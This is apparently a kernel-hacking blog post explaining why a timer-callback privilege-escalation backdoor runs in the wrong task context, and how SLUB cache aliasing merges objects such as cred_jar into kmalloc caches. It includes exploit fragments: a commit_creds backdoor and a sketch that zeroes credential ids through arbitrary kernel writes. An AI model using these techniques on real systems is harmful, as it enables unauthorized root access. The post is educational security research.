
Essentials and Pitfalls for Linux Kernel Hacking

In this blog, I will share some interesting essentials and pitfalls I ran into while exploiting the Linux kernel. I hope this can help you handle similar problems. :)

In addition, I will keep updating this blog as I keep learning and hacking.

Watch out for the task_struct context

I started thinking seriously about this while I was struggling to get privilege escalation working for a kernel heap exploitation challenge I was designing (for a course final exam, as a teaching assistant). The whole story can be boiled down to a simple question.

Below is a snippet of a vulnerable device driver.

init_timer(&timer);                          /* old-style (pre-4.15) timer API */
timer.function = &CONTROLABLE_FUNCTION_PTR;  /* attacker-controlled callback */
timer.expires = jiffies + 2 * HZ;            /* fire roughly two seconds later */
timer.data = 0;
add_timer(&timer);

As you can see, we can overwrite CONTROLABLE_FUNCTION_PTR to hijack the PC and redirect the control flow.

Here comes the question: ignoring SMEP, SMAP, and similar protections, if we redirect the control flow to a user-space backdoor that calls commit_creds(prepare_kernel_cred(0));, will it take effect and spawn a root shell for us? Think about that for a moment.


Okay, the answer is, unfortunately, NO. Why? It comes down to the context in which the backdoor function is executed.

In a nutshell, the infamous commit_creds(prepare_kernel_cred(0)); is only effective when the executing process is the one from which you later expect to launch system("/bin/sh"). In this case, however, your process context only registers the backdoor function; it does not execute it.
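
For reference, such a user-space backdoor usually looks roughly like the sketch below. The two addresses are placeholders I made up for illustration; in a real exploit they would be resolved from /proc/kallsyms or an info leak.

/* Sketch of the classic user-space backdoor; the addresses are placeholders. */
void *(*prepare_kernel_cred)(void *) = (void *)0xffffffff810a1810;  /* placeholder */
int   (*commit_creds)(void *)        = (void *)0xffffffff810a1420;  /* placeholder */

static void backdoor(void)
{
	/* Elevates the credentials of whatever task is `current` when this
	 * runs in kernel mode -- not necessarily our exploit process. */
	commit_creds(prepare_kernel_cred(0));
}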

So, which process will take the responsibility to execute your backdoor?

The answer is: no idea :D. In fact, it depends on the Linux scheduling mechanism and the timer delay. The task that happens to own the CPU when the timer interrupt has to be handled is the one whose context the handler runs in. It may be your intended exploit process, or it may not.

The call chain for processing the timer handler is run_timer_softirq(), then __run_timers(), and finally your malicious function.

We are drifting a little away from exploitation now... Anyway, commit_creds(prepare_kernel_cred(0)); won't work here, so we have to leak the current task_struct and use a ROP chain to perform an arbitrary write to the cred of our own process.
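
A minimal sketch of that last step, assuming the rest of the exploit already provides arbitrary kernel read/write primitives (kread64/kwrite32 are hypothetical helpers), that we know the offset of ->cred in task_struct for the target build (the value below is made up), and that CONFIG_DEBUG_CREDENTIALS is off so the eight id fields sit right after the usage counter:

#include <stdint.h>

/* Hypothetical primitives built on top of the ROP chain / vulnerability. */
uint64_t kread64(uint64_t kaddr);
void     kwrite32(uint64_t kaddr, uint32_t val);

#define OFFSET_TASK_CRED 0x5e8    /* example value, differs per kernel build */

static void patch_own_cred(uint64_t task)   /* leaked task_struct address */
{
	uint64_t cred = kread64(task + OFFSET_TASK_CRED);

	/* struct cred: usage (4 bytes), then uid, gid, suid, sgid,
	 * euid, egid, fsuid, fsgid -- zero all eight ids to become root. */
	for (int i = 1; i <= 8; i++)
		kwrite32(cred + i * 4, 0);
}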

Take care of kmem_cache aliasing

Two of my earlier blog posts contain material related to the cache alias optimization in exploitation. This time, let us lift its veil.

The very first part is in kmem_cache_create().

struct kmem_cache *
kmem_cache_create(const char *name, size_t size, size_t align,
		  unsigned long flags, void (*ctor)(void *))
{
	struct kmem_cache *s = NULL;
	const char *cache_name;
	int err;

	get_online_cpus();
	get_online_mems();
	memcg_get_cache_ids();

	mutex_lock(&slab_mutex);

	err = kmem_cache_sanity_check(name, size);
	if (err) {
		goto out_unlock;
	}

	/*
	 * Some allocators will constraint the set of valid flags to a subset
	 * of all flags. We expect them to define CACHE_CREATE_MASK in this
	 * case, and we'll just provide them with a sanitized version of the
	 * passed flags.
	 */
	flags &= CACHE_CREATE_MASK;

	s = __kmem_cache_alias(name, size, align, flags, ctor);     // HERE!
	if (s)
		goto out_unlock;

If __kmem_cache_alias() returns a non-NULL value, kmem_cache_create() will not go on to create a new cache but adopts the alias optimization instead. This technique helps to mitigate fragmentation in the SLUB allocator.

Inside that function, the kernel tries to find a suitable existing kmem_cache to merge with.

struct kmem_cache *
__kmem_cache_alias(const char *name, size_t size, size_t align,
		   unsigned long flags, void (*ctor)(void *))
{
	struct kmem_cache *s, *c;

	s = find_mergeable(size, align, flags, name, ctor);
	if (s) {
        /* ... */
	}

	return s;
}

How does the kernel decide whether a kmem_cache in the linked list is suitable for merging? The function find_mergeable() is in charge of that. Let's partition this function into several parts for better understanding.

// Part-1
struct kmem_cache *find_mergeable(size_t size, size_t align,
		unsigned long flags, const char *name, void (*ctor)(void *))
{
	struct kmem_cache *s;

	if (slab_nomerge || (flags & SLAB_NEVER_MERGE))
		return NULL;

	if (ctor)
		return NULL;

	size = ALIGN(size, sizeof(void *));
	align = calculate_alignment(flags, align, size);
	size = ALIGN(size, align);
	flags = kmem_cache_flags(size, flags, name, NULL);

    /* ... */
}

It first checks slab_nomerge. The description of this variable is as follows.

/*
 * Merge control. If this is set then no merging of slab caches will occur.
 * (Could be removed. This was introduced to pacify the merge skeptics.)
 */
static int slab_nomerge;

As the comment tells us, if this variable is set, no slab caches will be merged at all. (TODO: where is this variable set or unset?)
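
For what it's worth, I believe it can at least be set from the kernel command line via the slab_nomerge boot parameter (and, for SLUB, the older slub_nomerge spelling); the setup code in mm/slab_common.c should look roughly like this, quoted from memory:

static int __init setup_slab_nomerge(char *str)
{
	slab_nomerge = 1;
	return 1;
}

__setup("slab_nomerge", setup_slab_nomerge);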

At the same time, if the input flags carry any bit of SLAB_NEVER_MERGE, the function returns early. The special flag SLAB_NEVER_MERGE is a union of several flags; from my point of view, these flags are mainly about debugging.

/*
 * Set of flags that will prevent slab merging
 */
#define SLAB_NEVER_MERGE (SLAB_RED_ZONE | SLAB_POISON | SLAB_STORE_USER | \
		SLAB_TRACE | SLAB_DESTROY_BY_RCU | SLAB_NOLEAKTRACE | \
		SLAB_FAILSLAB)

// SLAB_RED_ZONE: (DEBUG) Red zone objs in a cache, non-writeable, detect overflow
// SLAB_POISON: (DEBUG) Poison objects, that is to say when allocating, fill with poison bytes
// SLAB_STORE_USER: (DEBUG) Store the last owner for bug hunting
// SLAB_TRACE: Trace allocations and frees
// SLAB_DESTROY_BY_RCU: Defer freeing slabs to RCU
// SLAB_NOLEAKTRACE: Avoid kmemleak tracing
// SLAB_FAILSLAB: Used to inject slab allocation failures, look at this
// => https://www.kernel.org/doc/Documentation/fault-injection/fault-injection.txt

That makes sense: when the newly created cache is used for debugging or tracing, merging it would not be advisable.

In addition, if the ctor (constructor) function pointer is not NULL, the function also returns early.

What if the constructors happen to be the same, though? :(

So far so good, let’s continue reading the code.

	list_for_each_entry_reverse(s, &slab_caches, list) {
		if (slab_unmergeable(s))
			continue;

		if (size > s->size)
			continue;

		if ((flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME))
			continue;
		/*
		 * Check if alignment is compatible.
		 * Courtesy of Adrian Drzewiecki
		 */
		if ((s->size & ~(align - 1)) != s->size)
			continue;

		if (s->size - size >= sizeof(void *))
			continue;

		if (IS_ENABLED(CONFIG_SLAB) && align &&
			(align > s->align || s->align % align))
			continue;

		return s;
	}
	return NULL;
}

The code then traverses the slab_caches list to see whether any existing cache satisfies the requirements. The first check, slab_unmergeable(), does almost the same thing as the earlier part, except that this time the object under examination is the candidate cache.

/*
 * Find a mergeable slab cache
 */
int slab_unmergeable(struct kmem_cache *s)
{
	if (slab_nomerge || (s->flags & SLAB_NEVER_MERGE))
		return 1;

	if (!is_root_cache(s))
		return 1;

	if (s->ctor)
		return 1;

	/*
	 * We may have set a slab to be unmergeable during bootstrap.
	 */
	if (s->refcount < 0)
		return 1;

	return 0;
}

There are some differences, though: is_root_cache() deals with memory cgroups, and a negative refcount corresponds to caches made unmergeable during the bootstrap stage. The remaining checks can be gone through as a list.

  1. size check: If the object size of the new cache is larger than that of the candidate, continue searching.

  2. flag check: The way the flags are compared is a little weird.

(flags & SLAB_MERGE_SAME) != (s->flags & SLAB_MERGE_SAME)
// ...

#define SLAB_MERGE_SAME (SLAB_RECLAIM_ACCOUNT | SLAB_CACHE_DMA | SLAB_NOTRACK)

The comparison tells us that only these three flags matter when picking a mergeable cache.

  • SLAB_RECLAIM_ACCOUNT: This flag is set for caches with objects that are easily reclaimable such as inode caches. A counter is maintained in a variable called slab_reclaim_pages to record how many pages are used in slabs allocated to these caches. This counter is later used in vm_enough_memory() to help determine if the system is truly out of memory. link
  • SLAB_CACHE_DMA: Allocate slabs with memory from ZONE_DMA
  • SLAB_NOTRACK: Flag to decide whether or not track use of uninitialized memory

Because I don't have a deep understanding of how the entire SLAB management system evolved (especially the debugging and checking subsystems), I don't know the exact reason for this choice. What we care about now is that the check passes if the candidate kmem_cache's flags equal the new cache's flags after both are ANDed with SLAB_MERGE_SAME.
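
A hypothetical illustration of how the masking plays out (the flag combinations are invented for the example):

/*
 * new cache:  flags = SLAB_HWCACHE_ALIGN               -> & SLAB_MERGE_SAME = 0
 * candidate:  flags = SLAB_HWCACHE_ALIGN | SLAB_PANIC  -> & SLAB_MERGE_SAME = 0
 * => both sides equal, the check passes
 *
 * new cache:  flags = SLAB_CACHE_DMA                   -> & SLAB_MERGE_SAME = SLAB_CACHE_DMA
 * candidate:  flags = 0                                -> & SLAB_MERGE_SAME = 0
 * => the sides differ, continue searching
 */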

The remaining three checks can be viewed together, as they are all related to alignment and size.

/*
 * Check if alignment is compatible.
 * Courtesy of Adrian Drzewiecki
 */
if ((s->size & ~(align - 1)) != s->size) 	// [*] Is the candidate's object size aligned to the new alignment?
	continue;

if (s->size - size >= sizeof(void *))		// [*] Is the extra space (internal fragmentation) small enough?
	continue;

if (IS_ENABLED(CONFIG_SLAB) && align &&		// [*] Are the two alignments compatible?
	(align > s->align || s->align % align))
	continue;

When all the above requirements are satisfied, the candidate kmem_cache is returned for merging.
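
To make these conditions concrete, here is a hedged sketch of a module-side cache that would normally end up merged into kmalloc-128 on such a kernel: no constructor, no debug flags, and an object size that lands in the same bucket. The name demo_cache is made up, and with slub_debug or slab_nomerge active it would of course stay separate.

#include <linux/module.h>
#include <linux/slab.h>

static struct kmem_cache *demo_cachep;

static int __init demo_init(void)
{
	/* No ctor, no debug flags, 128-byte objects: find_mergeable() will
	 * usually hand back the existing kmalloc-128 cache instead of
	 * creating a new one, so objects from this cache share slab pages
	 * with ordinary kmalloc-128 objects. */
	demo_cachep = kmem_cache_create("demo_cache", 128, 0,
					SLAB_HWCACHE_ALIGN, NULL);
	return demo_cachep ? 0 : -ENOMEM;
}

static void __exit demo_exit(void)
{
	kmem_cache_destroy(demo_cachep);
}

module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");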


Now it's time to think about this alias optimization. What do you say: does it harm security or not? In fact, it can be a double-edged sword. In CVE-2015-3636, the aliasing on 32-bit architectures causes trouble and extra effort for the attacker to control the heap state, while in CVE-2016-0728, the aliasing lets key_jar objects be easily hijacked by the attacker.

I wrote a simple program to record which caches alias with the kmalloc caches on my v4.4.0 virtual machine (the more dangerous case, in my view).

# A alias to B : A -> B
pid -> kmalloc-128
anon_vma_chain -> kmalloc-64
cred_jar -> kmalloc-192 !!
fs_cache -> kmalloc-64
key_jar  -> kmalloc-192
selinux_file_security -> kmalloc-16
avc_xperms_data -> kmalloc-32
names_cache -> kmalloc-4096
filp -> kmalloc-256
task_delay_info -> kmalloc-64
pool_workqueue -> kmalloc-256
skbuff_head_cache -> kmalloc-256
skbuff_fclone_cache -> kmalloc-512
uid_cache -> kmalloc-128
biovec-16 -> kmalloc-256
biovec-64 -> kmalloc-1024
biovec-128 -> kmalloc-2048
biovec-256 -> kmalloc-4096
bio-0 -> kmalloc-192
sgpool-8 -> kmalloc-256
sgpool-16 -> kmalloc-512
sgpool-32 -> kmalloc-1024
sgpool-64 -> kmalloc-2048
sgpool-128 -> kmalloc-4096
eventpoll_epi -> kmalloc-128
ip_dst_cache -> kmalloc-256
secpath_cache -> kmalloc-64
inet_peer_cache -> kmalloc-192
tcp_bind_bucket -> kmalloc-64
ip_mrt_cache -> kmalloc-128
rpc_tasks -> kmalloc-256
rpc_buffers -> kmalloc-2048
dnotify_struct -> kmalloc-32
aio_kiocb -> kmalloc-128
nfs_page -> kmalloc-128
sd_ext_cdb -> kmalloc-32
scsi_sense_cache -> kmalloc-128
io -> kmalloc-64
nf_conntrack_expect -> kmalloc-256
fib6_nodes -> kmalloc-64

To be honest, I have no idea what most of these weird kmem_cache names are for. But the number is considerably larger than I expected. What's more, we can see that cred_jar, pid, and other tasty objects are also merged into the generic kmalloc caches. Isn't that good news for every kernel hacker?
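
For completeness, here is a minimal sketch of how such a list can be gathered from user space on a SLUB kernel: merged caches show up as symlinks under /sys/kernel/slab, all pointing at a shared target such as :t-0000192, so caches whose links resolve to the same target are aliases of each other. This is not my exact tool, and mapping the shared target back to the corresponding kmalloc-* name is left out.

#include <stdio.h>
#include <dirent.h>
#include <limits.h>
#include <unistd.h>
#include <sys/types.h>

int main(void)
{
	DIR *d = opendir("/sys/kernel/slab");
	struct dirent *e;
	char path[PATH_MAX], target[PATH_MAX];

	if (!d)
		return 1;
	while ((e = readdir(d)) != NULL) {
		snprintf(path, sizeof(path), "/sys/kernel/slab/%s", e->d_name);
		ssize_t n = readlink(path, target, sizeof(target) - 1);
		if (n < 0)
			continue;          /* not a symlink => not a merged alias */
		target[n] = '\0';
		printf("%s -> %s\n", e->d_name, target);
	}
	closedir(d);
	return 0;
}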

addr_limit combined with pipefd

TODO

ret2dir strategy

TODO